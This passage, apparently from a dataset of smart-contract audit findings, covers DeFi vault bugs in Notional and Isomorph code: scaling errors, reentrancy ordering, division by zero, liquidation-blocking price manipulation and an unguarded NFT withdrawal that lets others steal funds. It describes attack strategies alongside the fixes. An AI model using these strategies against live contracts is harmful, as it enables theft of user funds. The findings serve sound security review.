This leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.\\nIn Line 120, it calls the `getScalingFactors` function of the LinearPool to fetch the scaling factors of the LinearPool.\\nIn Line 123, it computes the final scaling factor of the wrapped token by multiplying the main token's decimal scaling factor with the wrapped token rate, which is incorrect.\\n```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n });\\n }\\n```\\n\\nThe correct way of calculating the final scaling factor of the wrapped token is to multiply the wrapped token's decimal scaling factor by the wrapped token rate as shown below:\\n```\\nscalingFactors[_wrappedIndex] = 
_scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n```\\n\\nThe `_scalingFactorWrappedToken` is the scaling factor that, when multiplied to a token amount, normalizes its balance as if it had 18 decimals. The `_getWrappedTokenRate` function returns the wrapped token rate.\\nIt is important to note that the decimal scaling factor of the main and wrapped tokens are not always the same. Thus, they cannot be used interchangeably.\\n```\\n // Scaling factors\\n\\n function _scalingFactor(IERC20 token) internal view virtual returns (uint256) {\\n if (token == _mainToken) {\\n return _scalingFactorMainToken;\\n } else if (token == _wrappedToken) {\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token\\n // increases in value.\\n return _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n } else if (token == this) {\\n return FixedPoint.ONE;\\n } else {\\n _revert(Errors.INVALID_TOKEN);\\n }\\n }\\n\\n /**\\n * @notice Return the scaling factors for all tokens, including the BPT.\\n */\\n function getScalingFactors() public view virtual override returns (uint256[] memory) {\\n uint256[] memory scalingFactors = new uint256[](_TOTAL_TOKENS);\\n\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n scalingFactors[_mainIndex] = _scalingFactorMainToken;\\n scalingFactors[_wrappedIndex] = _scalingFactorWrappedToken.mulDown(_getWrappedTokenRate());\\n scalingFactors[_BPT_INDEX] = FixedPoint.ONE;\\n\\n return scalingFactors;\\n }\\n```\\nчThere is no need to manually calculate the final scaling factor of the wrapped token again within the code. This is because the wrapped token scaling factor returned by the `LinearPool.getScalingFactors()` function already includes the token rate. 
Refer to the Balancer's source code above for reference.\\n```\\nfunction _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n    (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n    uint256 mainIndex = underlyingPool.getMainIndex();\\n    uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n    (\\n        /* address[] memory tokens */,\\n        uint256[] memory underlyingBalances,\\n        /* uint256 lastChangeBlock */\\n    ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n    uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n// Remove the line below\\n    // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n// Remove the line below\\n    // value.\\n// Remove the line below\\n    uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n// Remove the line below\\n        BalancerConstants.BALANCER_PRECISION;\\n\\n    return UnderlyingPoolContext({\\n        mainScaleFactor: underlyingScalingFactors[mainIndex],\\n        mainBalance: underlyingBalances[mainIndex],\\n// Remove the line below\\n        wrappedScaleFactor: wrappedScaleFactor,\\n// Add the line below\\n        wrappedScaleFactor: underlyingScalingFactors[wrappedIndex], \\n        wrappedBalance: underlyingBalances[wrappedIndex],\\n        virtualSupply: underlyingPool.getVirtualSupply(),\\n        fee: underlyingPool.getSwapFeePercentage(),\\n        lowerTarget: lowerTarget,\\n        upperTarget: upperTarget \\n    });\\n}\\n```\\nчWithin the Boosted 3 leverage vault, the balances are scaled before passing them to the stable math function for computation since the stable math function only works with balances that have been normalized to 18 decimals. 
If the scaling factor is incorrect, all the computations within the leverage vault will be incorrect, which affects almost all the vault functions.\\nFor instance, the `Boosted3TokenAuraVault.convertStrategyToUnderlying` function relies on the wrapped scaling factor for its computation under the hood. This function is utilized by Notional's `VaultConfiguration.calculateCollateralRatio` function to determine the value of the vault share when computing the collateral ratio. If the underlying result is wrong, the collateral ratio will be wrong too, and this leads to an array of issues such as users being liquidated prematurely or users being able to borrow more than they are allowed to.ч```\\nFile: Boosted3TokenPoolMixin.sol\\n function _underlyingPoolContext(ILinearPool underlyingPool) private view returns (UnderlyingPoolContext memory) {\\n (uint256 lowerTarget, uint256 upperTarget) = underlyingPool.getTargets();\\n uint256 mainIndex = underlyingPool.getMainIndex();\\n uint256 wrappedIndex = underlyingPool.getWrappedIndex();\\n\\n (\\n /* address[] memory tokens */,\\n uint256[] memory underlyingBalances,\\n /* uint256 lastChangeBlock */\\n ) = Deployments.BALANCER_VAULT.getPoolTokens(underlyingPool.getPoolId());\\n\\n uint256[] memory underlyingScalingFactors = underlyingPool.getScalingFactors();\\n // The wrapped token's scaling factor is not constant, but increases over time as the wrapped token increases in\\n // value.\\n uint256 wrappedScaleFactor = underlyingScalingFactors[mainIndex] * underlyingPool.getWrappedTokenRate() /\\n BalancerConstants.BALANCER_PRECISION;\\n\\n return UnderlyingPoolContext({\\n mainScaleFactor: underlyingScalingFactors[mainIndex],\\n mainBalance: underlyingBalances[mainIndex],\\n wrappedScaleFactor: wrappedScaleFactor,\\n wrappedBalance: underlyingBalances[wrappedIndex],\\n virtualSupply: underlyingPool.getVirtualSupply(),\\n fee: underlyingPool.getSwapFeePercentage(),\\n lowerTarget: lowerTarget,\\n upperTarget: upperTarget \\n 
});\\n }\\n```\\n -Boosted3TokenPoolUtils.sol : _redeem - updating the `totalBPTHeld , totalStrategyTokenGlobal` after `_unstakeAndExitPool` is not safeчmediumч_redeem function is used to claim the BPT amount using the strategy tokens.\\nIt is first calling the `_unstakeAndExitPool` function and then updating the `totalBPTHeld , totalStrategyTokenGlobal`\\n```\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n if (bptClaim == 0) return 0;\\n\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n\\nFirst _unstakeAndExitPool is called and then totalBPTHeld and totalStrategyTokenGlobal are updated.чFirst update `totalBPTHeld and totalStrategyTokenGlobal` and then call the `_unstakeAndExitPool`чReentering during any of the function call inside `_unstakeAndExitPool` could be problematic. 
`stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false)` `BalancerUtils._swapGivenIn`\\nWell, it needs deep study to analyze the impact, but I would suggest updating the balance first and then calling the `_unstakeAndExitPool`ч```\\n function _redeem(\\n    ThreeTokenPoolContext memory poolContext,\\n    StrategyContext memory strategyContext,\\n    AuraStakingContext memory stakingContext,\\n    uint256 strategyTokens,\\n    uint256 minPrimary\\n) internal returns (uint256 finalPrimaryBalance) {\\n    uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n\\n    if (bptClaim == 0) return 0;\\n\\n\\n    finalPrimaryBalance = _unstakeAndExitPool({\\n        stakingContext: stakingContext,\\n        poolContext: poolContext,\\n        bptClaim: bptClaim,\\n        minPrimary: minPrimary\\n    });\\n\\n\\n    strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n    strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n    strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\n -Unable to deploy new leverage vault for certain MetaStable PoolчmediumчNotional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled.\\n```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n    constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n        TwoTokenPoolMixin(notional_, params)\\n    {\\n        // The oracle is required for the vault to behave properly\\n        (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n            IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n        require(oracleEnabled);\\n    }\\n```\\nчRemove the Balancer Oracle check from the constructor.\\n```\\n    constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n        TwoTokenPoolMixin(notional_, params)\\n    {\\n// Remove the line below\\n        // The oracle is required for the vault to behave properly\\n// Remove the line below\\n        (/* */, /* */, 
/* */, /* */, bool oracleEnabled) = \\n// Remove the line below\\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n// Remove the line below\\n require(oracleEnabled);\\n }\\n```\\nчNotional might have an issue deploying the new leverage vault for a MetaStable Pool that does not have Balancer Oracle enabled. Since Balancer Oracle has been deprecated, the Balancer Oracle will likely be disabled on the MetaStable Pool.ч```\\nFile: MetaStable2TokenVaultMixin.sol\\nabstract contract MetaStable2TokenVaultMixin is TwoTokenPoolMixin {\\n constructor(NotionalProxy notional_, AuraVaultDeploymentParams memory params)\\n TwoTokenPoolMixin(notional_, params)\\n {\\n // The oracle is required for the vault to behave properly\\n (/* */, /* */, /* */, /* */, bool oracleEnabled) = \\n IMetaStablePool(address(BALANCER_POOL_TOKEN)).getOracleMiscData();\\n require(oracleEnabled);\\n }\\n```\\n -Possible division by zero depending on `TradingModule.getOraclePrice` return valuesчmediumчSome functions depending on `TradingModule.getOraclePrice` accept non-negative (int256 `answer`, int256 decimals) return values. In case any of those are equal to zero, division depending on `answer` or `decimals` will revert. In the worst case scenario, this will prevent the protocol from continuing operating.\\nThe function `TradingModule.getOraclePrice` properly validates that return values from Chainlink price feeds are positive.\\nNevertheless, `answer` may currently return zero, as it is calculated as `(basePrice * quoteDecimals * RATE_DECIMALS) / (quotePrice * baseDecimals);`, which can be truncated down to zero, depending on base/quote prices [1]. 
Additionally, `decimals` may in the future return zero, depending on changes to the protocol code, as the NatSpec states that this is a `number of `decimals` in the rate, currently hardcoded to 1e18` [2].\\nIf any of these return values are zero, calculations that use division depending on `TradingModule.getOraclePrice` will revert.\\nMore specifically:\\n[1]\\n1.1 `TradingModule.getLimitAmount`\\n```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oraclePrice` is `0`\\n```\\n oraclePrice = (oracleDecimals * oracleDecimals) / oraclePrice;\\n```\\n\\n[2] 2.1 `TwoTokenPoolUtils._getOraclePairPrice`\\n```\\n require(decimals >= 0);\\n\\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\n\\n2.2 `TradingModule.getLimitAmount`\\n```\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n```\\n\\nthat calls `TradingUtils._getLimitAmount`, which reverts if `oracleDecimals` is `0`\\n```\\n limitAmount =\\n ((oraclePrice + \\n ((oraclePrice * uint256(slippageLimit)) /\\n Constants.SLIPPAGE_LIMIT_PRECISION)) * amount) / \\n oracleDecimals;\\n```\\n\\n2.3 `CrossCurrencyfCashVault.convertStrategyToUnderlying`\\n```\\n return (pvInternal * borrowTokenDecimals * rate) /\\n (rateDecimals * int256(Constants.INTERNAL_TOKEN_PRECISION));\\n```\\nчValidate that the return values are strictly positive (instead of non-negative) in case depending function calculations may result in division by zero. 
This can be either done on `TradingModule.getOraclePrice` directly or on the depending functions.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/trading/TradingModule.sol b/contracts/trading/TradingModule.sol\\nindex bfc8505..70b40f2 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/trading/TradingModule.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/trading/TradingModule.sol\\n@@ // Remove the line below\\n251,6 // Add the line below\\n251,9 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n (basePrice * quoteDecimals * RATE_DECIMALS) /\\n (quotePrice * baseDecimals);\\n decimals = RATE_DECIMALS;\\n// Add the line below\\n\\n// Add the line below\\n require(answer > 0); /// @dev Chainlink rate error\\n// Add the line below\\n require(decimals > 0); /// @dev Chainlink decimals error\\n }\\n \\n function _hasPermission(uint32 flags, uint32 flagID) private pure returns (bool) {\\n@@ // Remove the line below\\n279,9 // Add the line below\\n282,6 @@ contract TradingModule is Initializable, UUPSUpgradeable, ITradingModule {\\n // prettier// Remove the line below\\nignore\\n (int256 oraclePrice, int256 oracleDecimals) = getOraclePrice(sellToken, buyToken);\\n \\n// Remove the line below\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n// Remove the line below\\n require(oracleDecimals >= 0); /// @dev Chainlink decimals error\\n// Remove the line below\\n\\n limitAmount = TradingUtils._getLimitAmount({\\n tradeType: tradeType,\\n sellToken: sellToken,\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\nindex 4954c59..6315c0a 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n 
a/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/vaults/balancer/internal/pool/TwoTokenPoolUtils.sol\\n@@ // Remove the line below\\n76,10 // Add the line below\\n76,7 @@ library TwoTokenPoolUtils {\\n (int256 rate, int256 decimals) = tradingModule.getOraclePrice(\\n poolContext.primaryToken, poolContext.secondaryToken\\n );\\n// Remove the line below\\n require(rate > 0);\\n// Remove the line below\\n require(decimals >= 0);\\n \\n if (uint256(decimals) != BalancerConstants.BALANCER_PRECISION) {\\n rate = (rate * int256(BalancerConstants.BALANCER_PRECISION)) / decimals;\\n }\\n```\\nчIn the worst case, the protocol might stop operating.\\nAlbeit unlikely that `decimals` is ever zero, since currently this is a hardcoded value, it is possible that `answer` might be zero due to round-down performed by the division in `TradingModule.getOraclePrice`. This can happen if the quote token is much more expensive than the base token. In this case, `TradingModule.getLimitAmount` and depending calls, such as `TradingModule.executeTradeWithDynamicSlippage` might revert.ч```\\n require(oraclePrice >= 0); /// @dev Chainlink rate error\\n```\\n -Malicious user can DOS pool and avoid liquidation by creating secondary liquidity pool for Velodrome token pairчhighчFor every Vault_Velo interaction the vault attempts to price the liquidity of the user. This calls priceLiquidity in the corresponding DepositReceipt. This prices the underlying assets by swapping them through the Velodrome router. Velodrome can have both a stable and volatile pool for each asset pair. When calling the router directly it routes through the pool that gives the best price. In priceLiquidity the transaction will revert if the router routes through the wrong pool (i.e. trading the volatile pool instead of the stable pool). A malicious user can use this to their advantage to avoid being liquidated.
They could manipulate the price of the opposite pool so that any call to liquidate them would route through the wrong pool and revert.\\n```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n```\\n\\nDepositReceipt uses the getAmountOut call the estimate the amountOut. The router will return the best rate between the volatile and stable pool. If the wrong pool give the better rate then the transaction will revert. Since pricing is called during liquidation, a malicious user could manipulate the price of the wrong pool so that it returns the better rate and always reverts the liquidation call.чInstead of quoting from the router, query the correct pool directly:\\n```\\n uint256 amountOut; //amount received by trade\\n- bool stablePool; //if the traded pool is stable or volatile.\\n\\n- (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n- require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n+ address pair;\\n\\n+ pair = router.pairFor(token1, USDC, stable)\\n+ amountOut = IPair(pair).getAmountOut(HUNDRED_TOKENS, token1)\\n```\\nчMalicious user can avoid liquidationч```\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n require(stablePool == stable, \"pricing occuring through wrong pool\" );\\n```\\n -Users are unable close or add to their Lyra vault positions when price is stale or circuit breaker is trippedчhighчUsers are unable close or add to their Lyra vault positions when price is stale or circuit breaker is tripped. This is problematic for a few reasons. 
First is that the circuit breaker can be tripped indefinitely which means their collateral could be frozen forever and they will be accumulating interest the entire time they are frozen. The second is that since they can't add any additional collateral to their loan, the loan may end up being underwater by the time the price is no longer stale or circuit breaker is no longer tripped. They may have wanted to add more assets and now they are liquidated, which is unfair as users who are liquidated are effectively forced to pay a fee to the liquidator.\\n```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n //ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), \"Global Cache Stale, can't trade\");\\n require(circuitBreakerExpiry < block.timestamp, \"Lyra Circuit Breakers active, can't trade\");\\n}\\n```\\n\\nThe above lines are run every time a user tries to interact with the vault. Currently this is overly restrictive and can lead to a lot of undesired situations, as explained in the summary.чThe contract is frozen when price is stale or circuit breaker is tripped to prevent price manipulation. While it should restrict a majority of actions there are two that don't need any price validation. If a user wishes to close out their entire loan then there is no need for price validation because the user has no more debt and therefore doesn't need to maintain any level of collateralization. The other situation is if a user adds collateral to their vault and doesn't take out any more loans.
In this scenario, the collateralization can only increase, which means that price validation is not necessary.\\nI recommend the following changes to closeLoan:\\n```\\n- _checkIfCollateralIsActive(currencyKey);\\n uint256 isoUSDdebt = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n require( isoUSDdebt >= _USDToVault, \"Trying to return more isoUSD than borrowed!\");\\n uint256 outstandingisoUSD = isoUSDdebt - _USDToVault;\\n if(outstandingisoUSD >= TENTH_OF_CENT){ //ignore leftover debts less than $0.001\\n+ //only need to check collateral value if user has remaining debt\\n+ _checkIfCollateralIsActive(currencyKey);\\n uint256 collateralLeft = collateralPosted[_collateralAddress][msg.sender] - _collateralToUser;\\n uint256 colInUSD = priceCollateralToUSD(currencyKey, collateralLeft); \\n uint256 borrowMargin = (outstandingisoUSD * minOpeningMargin) / LOAN_SCALE;\\n require(colInUSD > borrowMargin , \"Remaining debt fails to meet minimum margin!\");\\n }\\n```\\n\\nI recommend removing liquidation threshold check from increaseCollateralAmount:\\n```\\n //debatable check begins here \\n- uint256 totalCollat = collateralPosted[_collateralAddress][msg.sender] + _colAmount;\\n- uint256 colInUSD = priceCollateralToUSD(currencyKey, totalCollat);\\n- uint256 USDborrowed = (isoUSDLoanAndInterest[_collateralAddress][msg.sender] * virtualPrice) / LOAN_SCALE;\\n- uint256 borrowMargin = (USDborrowed * liquidatableMargin) / LOAN_SCALE;\\n- require(colInUSD >= borrowMargin, \"Liquidation margin not met!\");\\n //debatable check ends here\\n```\\nчFrozen assets, unfair interest accumulation and unfair liquidationsч```\\nfunction _checkIfCollateralIsActive(bytes32 _currencyKey) internal view override {\\n \\n //Lyra LP tokens use their associated LiquidityPool to check if they're active\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n bool isStale;\\n uint circuitBreakerExpiry;\\n 
//ignore first output as this is the token price and not needed yet.\\n (, isStale, circuitBreakerExpiry) = LiquidityPool.getTokenPriceWithCheck();\\n require( !(isStale), \"Global Cache Stale, can't trade\");\\n require(circuitBreakerExpiry < block.timestamp, \"Lyra Circuit Breakers active, can't trade\");\\n}\\n```\\n -Anyone can withdraw user's Velo Deposit NFT after approval is given to depositorчhighч`Depositor#withdrawFromGauge` is a public function that can be called by anyone which transfers token to `msg.sender`. `withdrawFromGauge` burns the NFT to be withdrawn, which means that `Depositor` must either be approved or be in possession of the NFT. Since it doesn't transfer the NFT to the contract before burning the user must either send the NFT to the `Depositor` or `approve` the `Depositor` in a separate transaction. After the NFT is either transferred or approved, a malicious user could withdraw the NFT for themselves.\\n```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n\\n`Depositor#withdrawFromGauge` allows anyone to call it, burning the NFT and sending `msg.sender` the withdrawn tokens.\\n```\\nfunction burn(uint256 _NFTId) external onlyMinter{\\n require(_isApprovedOrOwner(msg.sender, _NFTId), \"ERC721: caller is not token owner or approved\");\\n delete pooledTokens[_NFTId];\\n delete relatedDepositor[_NFTId];\\n _burn(_NFTId);\\n}\\n```\\n\\n`Depositor` calls `DepositReceipt_Base#burn`, which means that it must be either the owner or approved for the NFT. 
Since `Depositor#withdrawFromGauge` doesn't transfer the NFT from the user, this must happen in a separate transaction. Between the user approval/transfer and them calling `Depositor#withdrawFromGauge` a malicious user could call `Depositor#withdrawFromGauge` first to withdraw the NFT and steal the users funds. This would be very easy to automate with a bot.\\nExample: `User A` deposits 100 underlying into their `Depositor` and is given `Token A` which represents their deposit. After some time they want to redeem `Token A` so they `Approve` their `Depositor` for `Token A`. `User B` sees the approval and quickly calls `Depositor#withdrawFromGauge` to withdraw `Token A`. `User B` is sent the 100 tokens and `Token A` is burned from `User A`.чOnly allow owner of NFT to withdraw it:\\n```\\n function withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n+ require(depositReceipt.ownerOf(_NFTId) == msg.sender);\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n }\\n```\\nчUsers attempting to withdraw can have their funds stolenч```\\nfunction withdrawFromGauge(uint256 _NFTId, address[] memory _tokens) public {\\n uint256 amount = depositReceipt.pooledTokens(_NFTId);\\n depositReceipt.burn(_NFTId);\\n gauge.getReward(address(this), _tokens);\\n gauge.withdraw(amount);\\n //AMMToken adheres to ERC20 spec meaning it reverts on failure, no need to check return\\n //slither-disable-next-line unchecked-transfer\\n AMMToken.transfer(msg.sender, amount);\\n}\\n```\\n -Swapping 100 tokens in DepositReceipt_ETH and DepositReciept_USDC breaks usage of WBTC LP and other high value tokensчhighчDepositReceipt_ETH and DepositReciept_USDC checks the value of liquidity by swapping 
100 tokens through the swap router. WBTC is a good example of a token that will likely never work as LP due to the massive value of swapping 100 WBTC. This makes DepositReceipt_ETH and DepositReciept_USDC revert during slippage checks after calculating amount out. As of the time of writing this, WETH also experiences a 11% slippage when trading 100 tokens. Since DepositReceipt_ETH only supports 18 decimal tokens, WETH/USDC would have to use DepositReciept_USDC, resulting in WETH/USDC being incompatible. The fluctuating liquidity could also make this a big issue as well. If liquidity reduces after deposits are made, user deposits could be permanently trapped.\\n```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n\\nThe above lines try to swap 100 tokens from token1 to USDC. In the case of WBTC 100 tokens is a monstrous amount to swap. 
Given the low liquidity on the network, it simply won't function due to slippage requirements.\\n```\\nfunction _priceCollateral(IDepositReceipt depositReceipt, uint256 _NFTId) internal view returns(uint256){ \\n uint256 pooledTokens = depositReceipt.pooledTokens(_NFTId); \\n return( depositReceipt.priceLiquidity(pooledTokens));\\n}\\n\\nfunction totalCollateralValue(address _collateralAddress, address _owner) public view returns(uint256){\\n NFTids memory userNFTs = loanNFTids[_collateralAddress][_owner];\\n IDepositReceipt depositReceipt = IDepositReceipt(_collateralAddress);\\n //slither-disable-next-line uninitialized-local-variables\\n uint256 totalPooledTokens;\\n for(uint256 i =0; i < NFT_LIMIT; i++){\\n //check if each slot contains an NFT\\n if (userNFTs.ids[i] != 0){\\n totalPooledTokens += depositReceipt.pooledTokens(userNFTs.ids[i]);\\n }\\n }\\n return(depositReceipt.priceLiquidity(totalPooledTokens));\\n}\\n```\\n\\nOne of the two functions above is used to price LP for every vault action on Vault_Velo. If liquidity is sufficient when user deposits but then dries up after, the user's deposit would be permanently trapped in the vault. In addition to this liquidation would also become impossible causing the protocol to assume bad debt.\\nThis could also be exploited by a malicious user. First they deposit a large amount of collateral into the Velodrome WBTC/USDC pair. They take a portion of their LP and take a loan against it. Now they withdraw the rest of their LP. Since there is no longer enough liquidity to swap 100 tokens with 5% slippage, they are now safe from liquidation, allowing a risk free loan.чChange the number of tokens to an immutable, so that it can be set individually for each token. Optionally you can add checks (shown below) to make sure that the number of tokens being swapped will result in at least some minimum value of USDC being received.
Similar changes should be made for DepositReceipt_ETH:\\n```\\nconstructor(string memory _name, \\n string memory _symbol, \\n address _router, \\n address _token0,\\n address _token1,\\n uint256 _tokensToSwap,\\n bool _stable,\\n address _priceFeed) \\n ERC721(_name, _symbol){\\n\\n // rest of code\\n\\n if (keccak256(token0Symbol) == keccak256(USDCSymbol)){\\n require( IERC20Metadata(_token1).decimals() == 18, \"Token does not have 18dp\");\\n\\n+ (amountOut,) = _router.getAmountOut(_tokensToSwap, token1, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n else\\n { \\n bytes memory token1Symbol = abi.encodePacked(IERC20Metadata(_token1).symbol());\\n require( keccak256(token1Symbol) == keccak256(USDCSymbol), \"One token must be USDC\");\\n require( IERC20Metadata(_token0).decimals() == 18, \"Token does not have 18dp\");\\n \\n+ (amountOut, ) = _router.getAmountOut(_tokensToSwap, token0, USDC);\\n\\n+ //swapping tokens must yield at least 100 USDC\\n+ require( amountOut >= 1e8);\\n+ tokensToSwap = _tokensToSwap;\\n }\\n```\\nчLPs that contain high value tokens will be unusable at best and freeze user funds or be abused at the worst caseч```\\n //check swap value of 100tokens to USDC to protect against flash loan attacks\\n uint256 amountOut; //amount received by trade\\n bool stablePool; //if the traded pool is stable or volatile.\\n (amountOut, stablePool) = router.getAmountOut(HUNDRED_TOKENS, token1, USDC);\\n```\\n -Lyra vault underestimates the collateral valueчmediumчLyra vault subtracts the withdrawal fee while calculating the collateral value in USD, and it does not match the actual Lyra Pool implementation.\\nThe user's collateral value is estimated using the function `priceCollateralToUSD()` at `Vault_Lyra.sol#L77` as follows.\\n```\\nfunction priceCollateralToUSD(bytes32 _currencyKey, uint256 _amount) public view override returns(uint256){\\n //The LiquidityPool 
associated with the LP Token is used for pricing\\n ILiquidityPoolAvalon LiquidityPool = ILiquidityPoolAvalon(collateralBook.liquidityPoolOf(_currencyKey));\\n //we have already checked for stale greeks so here we call the basic price function.\\n uint256 tokenPrice = LiquidityPool.getTokenPrice();\\n uint256 withdrawalFee = _getWithdrawalFee(LiquidityPool);\\n uint256 USDValue = (_amount * tokenPrice) / LOAN_SCALE;\\n //we remove the Liquidity Pool withdrawalFee\\n //as there's no way to remove the LP position without paying this.\\n uint256 USDValueAfterFee = USDValue * (LOAN_SCALE- withdrawalFee)/LOAN_SCALE;\\n return(USDValueAfterFee);\\n}\\n```\\n\\nSo it is understood that the withdrawal fee is removed to get the reasonable value of the collateral. But according to the Lyra Pool implementation, the token price used for withdrawal is calculated using the function `_getTotalBurnableTokens`. And the function `_getTotalBurnableTokens` is as belows.\\n```\\nfunction _getTotalBurnableTokens()\\n internal\\n returns (\\n uint tokensBurnable,\\n uint tokenPriceWithFee,\\n bool stale\\n )\\n {\\n uint burnableLiquidity;\\n uint tokenPrice;\\n (tokenPrice, stale, burnableLiquidity) = _getTokenPriceAndStale();\\n\\n if (optionMarket.getNumLiveBoards() != 0) {\\n tokenPriceWithFee = tokenPrice.multiplyDecimal(DecimalMath.UNIT - 